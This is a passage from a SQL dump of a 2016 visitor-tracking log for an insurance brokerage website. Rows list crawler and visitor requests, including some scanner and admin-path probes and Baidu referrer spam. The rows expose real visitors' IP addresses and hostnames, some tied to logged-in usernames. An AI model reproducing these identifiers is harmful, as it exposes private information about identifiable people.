9','','','','','','','','0','0',0),(800,'0b_7330fb4eaa97b0c6424d9e7d3f005d06','1457107377','69.175.22.218','newscan02.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(803,'0b_7330fb4eaa97b0c6424d9e7d3f005d06','1457107381','69.175.22.218','newscan02.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(806,'0b_7330fb4eaa97b0c6424d9e7d3f005d06','1457107384','69.175.22.218','newscan02.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(808,'0b_7330fb4eaa97b0c6424d9e7d3f005d06','1457107386','69.175.22.218','newscan02.sitelock.com','/register/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(811,'0b_170a2bc9144e06207203b4a82dca14dc','1457107389','69.175.22.218','newscan02.sitelock.com','/?page_id=171?a=pwdreset','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(814,'0b_7330fb4eaa97b0c6424d9e7d3f005d06','1457107391','69.175.22.218','newscan02.sitelock.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(817,'0b_7330fb4eaa97b0c6424d9e7d3f005d06','1457107392','69.175.22.218','newscan02.sitelock.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(818,'0b_2510d7b4946dff885b79d03b2a2cae87','1457108432','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','0',0),(820,'0b_2510d7b4946dff885b79d03b2a2cae87','1457108434','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','0',0),(823,'0b_cb2c387cbf1781c5ede144f4d3642dbf','1457108552','66.249.75.89','crawl-66-249-75-89.googlebot.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(826,'0b_2510d7b4946dff885b79d03b2a2cae87','1457108715','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(827,'0b_2510d7b4946dff885b79d03b2a2cae87','1457108717','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','0',0),(829,'0b_a487de09c8012d41f699e0851c2faa82','1457109703','68.132.50.140','68.132.50.140','/','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','https://www.google.com/','_notprovided_',1,'Android 4','Safari 1','us','','Google','','','','','0','0',0),(830,'0b_a487de09c8012d41f699e0851c2faa82','1457109714','68.132.50.140','68.132.50.140','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 4','Safari 1','us','','','','','','','0','0',0),(832,'0b_a487de09c8012d41f699e0851c2faa82','1457109733','68.132.50.140','68.132.50.140','/about-us/','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 4','Safari 1','us','360 x 640','','','','','','0','0',0),(835,'0b_a487de09c8012d41f699e0851c2faa82','1457109789','68.132.50.140','68.132.50.140','/carriers/','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/about-us/','',0,'Android 4','Safari 1','us','360 x 640','','','','','','0','51',0),(838,'0b_a487de09c8012d41f699e0851c2faa82','1457109807','68.132.50.140','68.132.50.140','/contact/','Mozilla/5.0 (Linux; Android 4.4.4; en-us; SAMSUNG SM-G900P Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.6 Chrome/28.0.1500.94 Mobile Safari/537.36','http://www.empireins.com/carriers/','',0,'Android 4','Safari 1','us','360 x 640','','','','','','0','51',0),(841,'0b_990677cdf761ffd286530de5925c047d','1457111960','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(844,'0b_6a5e0cf88cee717a358400248ea2c8b9','1457111966','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(847,'0b_6a5e0cf88cee717a358400248ea2c8b9','1457111966','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','0',0),(850,'0b_6a5e0cf88cee717a358400248ea2c8b9','1457112136','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(853,'0b_6a5e0cf88cee717a358400248ea2c8b9','1457112339','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(856,'0b_6a5e0cf88cee717a358400248ea2c8b9','1457112480','75.99.37.250','ool-4b6325fa.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1920 x 1080','','','','SimkowitzCo','','0','51',0),(859,'0b_d519837f7f062b035b3ed1a7ea26bb01','1457113870','207.46.13.46','msnbot-207-46-13-46.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(862,'0b_2f826db207f0cc9bb97aa6deec3048f9','1457114724','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 48','us','1280 x 720','','','','','','0','0',0),(863,'0b_c04f85416d399a718124b0a0b37d3b93','1457114751','4.15.148.70','4.15.148.70','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 48','us','','Google','','','','','0','0',0),(866,'0b_c04f85416d399a718124b0a0b37d3b93','1457114762','4.15.148.70','4.15.148.70','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(868,'0b_72250b607dafde4d38d65f33015947e0','1457115029','54.159.9.131','ec2-54-159-9-131.compute-1.amazonaws.com','[404] /pdf/bankers_companies_ok_to_convert_from.pdf','User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31','','',0,'Win7','','','','','Internet','','','','0','0',0),(871,'0b_671457b3de3105a29db1f6a01a1139ca','1457116250','104.223.94.242','104.223.94.242.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(872,'0b_0d9199751558bbf172e11bf3f62a8dae','1457118073','180.76.15.136','baiduspider-180-76-15-136.crawl.baidu.com','/agent-tools/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(875,'0b_e5e96eabb9fff906ca27ce78fd16d169','1457122229','83.217.26.135','beecube.ru','/?option=com_user&view=register','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','ru','','','Yahoo!','','','','0','0',0),(878,'0b_44976a5e1355927bcc803a2ae557717d','1457124894','104.223.94.242','104.223.94.242.static.quadranet.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinVista x64','Firefox 15','ua','','','','','','','0','0',0),(881,'0b_8df1ac187c9debb95514fc9ec149ed92','1457125312','188.32.128.36','broadband-188-32-128-36.nationalcablenetworks.ru','/','Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.12','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=983.XZxeZDmp2ykCInLQSAsngwPM687J1_Ltxuuo5s1mdE55O_aFiUaDzUdNGOI8cNF3.8191ccae2e787df91ce3d1077b013a7010720469&uuid=&state=AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW9J0KiE5XNXd0dp0ZMwFHoviUoYa6nzP7MSi3gOS8hVmK8QQ5lEt3v-2IGljeu4Acqo2OLtEiXGz1HiLUM51vVQbXpTGZFJm53mbWIy4El4wDpnmgLX0gmiPrMqwBcXcm_RKcbeC3C9RsfrTOj37gum5tWppM5vHm3fhCiULkm_3LNrfNzogXGoA&data=UlNrNmk5WktYejR0eWJFYk1LdmtxanJHSFhXak9Sei1wb0JZNnQ1Y0dPc0twRHQweXU3Qi1NdndtSGJVbkpBWng0OTR1SDFPX2dnMFpTTUVkNkdzVGtvSVJoSEVJem1zVU13SnAzYWxOTjg&b64e=2&sign=07a583ae0548c0dae8ef74db7f7bc6b2&keyno=0&l10n=ru&cts=1457124576605&mc=5.3751524364','',0,'WinXP','Opera 9','ru','','','','','','','0','0',0),(884,'0b_ef485e347aa7aaa5507b33e0151ede06','1457125312','46.242.73.5','broadband-46-242-73-5.nationalcablenetworks.ru','/resources.htm','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36 OPR/18.0.1284.49 (Edition Yx)','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=983.ThNtEGheBh9JK2onaWCmTPPxD_IUBh-CNEgEdPixJYXEuQNmtYb3QNy6H_B3BvXY.2145d3cd9d848974772fd8aafd61762ff34e421b&uuid=&state=AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW9J0KiE5XNXd0dp0ZMwFHoviUoYa6nzP7MFsomsouu4qdi-O3T7Ct1HDmy-_aZFn9gjlO2WsfGqpc9IX2DBdqUe344UM8PHrtyYSET-Q80L64Q37bYLaj2GCVeIlJelokBt4uU15id1gUR7EpRIY5_QB6cEDyAOqOO3wmIm9zf-O-G_cwEHBOT8w&data=UlNrNmk5WktYejR0eWJFYk1LdmtxanJHSFhXak9Sei1wb0JZNnQ1Y0dPdFQ0TnVEekxvOExTaTVvVXh2WHN4LXhEVnJlc2E3RzkyTk9GUkRBdmYwQjV3UXJxZzFZdEw3SXVPNmliZUtkc3U0amtIMVNlNHByQQ&b64e=2&sign=cded0bc2176ae5ebc5791145eec0355d&keyno=0&l10n=ru&cts=1457124576604&mc=4.94094796865','',0,'Win7','Google Chrome','ru','','','','','','','0','0',0),(886,'0b_8df1ac187c9debb95514fc9ec149ed92','1457125318','188.32.128.36','broadband-188-32-128-36.nationalcablenetworks.ru','/assets/js/google-code-prettify/prettify.css','Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.12','http://www.empireins.com/','',0,'WinXP','Opera 9','ru','','','','','','','0','0',0),(887,'0b_fdfe7edb26cd768c09566d90ddeb30d3','1457125316','2.92.131.53','2.92.131.53','/products.html','Mozilla/5.0 (Windows NT 5.1; rv:26.0) Gecko/20100101 Firefox/26.0','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=983.8t5AP5CXndEn8WeTde_Xfh0e3JI6Ozk2UPUJFSkP3XNJyW75SxbiRb9Zr8d7MwnG.419f6914128bb9d216d939c86d2f65fb47bc67cb&uuid=&state=AiuY0DBWFJ4ePaEse6rgeAjgs2pI3DW9J0KiE5XNXd0dp0ZMwFHoviUoYa6nzP7MFsomsouu4qfAp3-g7lOq2wn1zrMfeXVSIk0fFiDUyWb8UyLAtCg8bFOC9hPPfiPVIpwQkasIi1WkEdps82t2r84VkDilwi_HY4jSvCe3ZycD0nhxcBULUk5vuRcUbflvy6F-lJ-BHvsMbQHtaipbsg&data=UlNrNmk5WktYejR0eWJFYk1LdmtxanJHSFhXak9Sei1wb0JZNnQ1Y0dPc3ZOOUVOcGtlYkNfRFEwNGh0N0JtV2lndDBGWUZxQkVSOWNOdWJtUlNOMGFwSmxvOVZ2aEcybGRJUWlQajczcVFha3lMcS05cm04UQ&b64e=2&sign=063ae304a96eebccaa03a73751f38f78&keyno=0&l10n=ru&cts=1457124576605&mc=1.88700267212','',0,'WinXP','Firefox 26','ru','','','','','','','0','0',0),(890,'0b_e7d9dd7680cd97ee34986fce5f12fac9','1457125494','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(892,'0b_04fdeae0001ceeb498bd242530f89727','1457125971','216.81.71.73','216.81.71.73','/','=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16','','',0,'Win7','','','','','','','','','0','0',0),(893,'0b_3d6c2e55d8082c43161a2f315e9f5eb7','1457128222','157.55.39.37','msnbot-157-55-39-37.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(896,'0b_e0f81c722c03f1b384c7c14a0d2e83bb','1457129149','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(899,'0b_9127c34cfbf199dd066c610242d23ead','1457129655','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(901,'0b_f505b2995b5409b11b734a70847787cf','1457130329','5.149.254.109','5.149.254.109','/wordpress/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2563.97 Safari/527.26','','',0,'Linux','Chrome 48','','','','','','','','0','0',0),(902,'0b_15d4f79836386f8ccf46d4e9cfb15bf7','1457130382','99.117.161.59','99-117-161-59.lightspeed.irvnca.sbcglobal.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'MacOSX','Chrome 48','us','','Google','','','','','0','0',0),(905,'0b_15d4f79836386f8ccf46d4e9cfb15bf7','1457130384','99.117.161.59','99-117-161-59.lightspeed.irvnca.sbcglobal.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'MacOSX','Chrome 48','us','','','','','','','0','0',0),(908,'0b_d49abab11cbd02f502d57f9b930483da','1457130766','99.117.161.59','99-117-161-59.lightspeed.irvnca.sbcglobal.net','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'MacOSX','Chrome 48','us','1920 x 1080','Google','','','','','0','0',0),(910,'0b_1534dfb9b22daff039bd7cdc66ace5bb','1457135875','68.180.229.244','b115450.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(913,'0b_1534dfb9b22daff039bd7cdc66ace5bb','1457135905','68.180.229.244','b115450.yse.yahoo.net','/under.html','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(916,'0b_71351cd0e061d2571b426c45d6bc6b08','1457135912','68.180.230.57','b115405.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(917,'0b_71351cd0e061d2571b426c45d6bc6b08','1457135915','68.180.230.57','b115405.yse.yahoo.net','/under.html','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(920,'0b_abdcdea5850e07469800db6ed96754dc','1457136289','157.55.12.88','msnbot-157-55-12-88.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(922,'0b_b6a4ae69564dd18f755ba7311d4ad68b','1457143861','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(923,'0b_26bd11ddf6cdd267d1ba76f2bbd5d3b8','1457144782','188.42.240.119','188.42.240.119','/','mfibot/1.1 (http://www.mfisoft.ru/analyst/; <admin@mfisoft.ru>; en-RU)','','',0,'','','ru','','','mfibot','','','','0','0',0),(925,'0b_752184c59510e26b18dd794b8577b0bb','1457144941','66.249.75.89','crawl-66-249-75-89.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(926,'0b_ce6fcf240643e4a8f5b6b4c14635f2aa','1457146025','66.249.75.96','crawl-66-249-75-96.googlebot.com','/under.html','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(929,'0b_6a3cebb637aca182b02a44a572456659','1457146555','180.76.15.142','baiduspider-180-76-15-142.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(931,'0b_87a8ec78ab83b5701d3103be537c8a84','1457146762','66.249.75.103','crawl-66-249-75-103.googlebot.com','/register/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(932,'0b_e87663839dc16bdf8561d0df1a7c8d72','1457147600','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(934,'0b_f6ad703ff9b2b1d341bd76f75921601c','1457147990','151.80.40.50','ns3556902.ip-151-80-40.eu','/register/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','0','0',0),(937,'0b_885f162969d4aaaf801503ee8845c66a','1457148535','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(938,'0b_364620c13617ef18662f9fe495185dea','1457148771','52.53.241.188','ec2-52-53-241-188.us-west-1.compute.amazonaws.com','/','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)','http://www.baidu.com/s?wd=百度权重_百度权重提升_联系Q:308389820_www.hjcs356l.com','百度权重_百度权重提升_联系Q:308389820_www.hjcs356l.com',1,'WinXP x64','IE 6','cn','','Baidu','','','','','0','0',0),(941,'0b_364620c13617ef18662f9fe495185dea','1457148774','52.53.241.188','ec2-52-53-241-188.us-west-1.compute.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)','http://www.empireins.com/','',0,'WinXP x64','IE 6','us','','','','','','','0','0',0),(943,'0b_951ef22cfdf1494967e4c4cbce1b5819','1457151547','64.246.165.50','www.whois.sc','/robots.txt','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','','',0,'WinXP','Firefox 3','sc','','','SurveyBot','','','','0','0',0),(946,'0b_951ef22cfdf1494967e4c4cbce1b5819','1457151548','64.246.165.50','www.whois.sc','/','Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.13) Gecko/2009073022 Firefox/3.5.2 (.NET CLR 3.5.30729) SurveyBot/2.3 (DomainTools)','http://whois.domaintools.com/empireins.com','',0,'WinXP','Firefox 3','sc','','','SurveyBot','','','','0','0',0),(949,'0b_1b0f188727fc8aafc91f79379eaf4d11','1457151673','40.77.167.34','msnbot-40-77-167-34.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(952,'0b_df8ca6c612290247a748377e001f6aae','1457152712','71.235.91.148','c-71-235-91-148.hsd1.ct.comcast.net','/','Mozilla/5.0 (Linux; Android 5.1; HTC Desire 626s Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','','',0,'Android 5','Chrome 48 Mobile','us','','','','','','','0','0',0),(955,'0b_df8ca6c612290247a748377e001f6aae','1457152714','71.235.91.148','c-71-235-91-148.hsd1.ct.comcast.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.1; HTC Desire 626s Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 48 Mobile','us','','','','','','','0','0',0),(956,'0b_1baa77e03b835ec092208efa2cc4775c','1457152926','123.125.71.111','baiduspider-123-125-71-111.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(958,'0b_8aecf998939f82ddc94ec4639ec8b050','1457154044','208.115.111.66','208-115-111-66-reverse.wowrack.com','/carriers/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(961,'0b_b3fd4c1913b74b9853745537e4d2854c','1457154088','66.249.75.89','crawl-66-249-75-89.googlebot.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(964,'0b_5d108c3dbd3ad94bf7b42fbe423616b8','1457154526','66.249.75.102','crawl-66-249-75-102.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(965,'0b_b3fd4c1913b74b9853745537e4d2854c','1457154559','66.249.75.95','crawl-66-249-75-95.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(968,'0b_35c196fa096670fd33c6efc1623b770b','1457162698','157.55.39.241','msnbot-157-55-39-241.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(970,'0b_35c196fa096670fd33c6efc1623b770b','1457162759','157.55.39.241','msnbot-157-55-39-241.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(971,'0b_e95bf9a392d26147369b60e286b1bde0','1457163630','66.249.75.96','crawl-66-249-75-96.googlebot.com','/members/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(974,'0b_16f923b3be0e460f8cf1d4049bf5af95','1457166183','157.55.39.241','msnbot-157-55-39-241.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(977,'0b_81121fdfd3295a3f51a801f62a8b2205','1457170604','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(980,'0b_95ba2363058d8955d0eb78afe1fe26dd','1457171169','66.249.75.89','crawl-66-249-75-89.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(983,'0b_95ba2363058d8955d0eb78afe1fe26dd','1457171186','66.249.75.89','crawl-66-249-75-89.googlebot.com','/term-quotes/','Mozilla/5.0 (compatible; Googlebot/2.1; 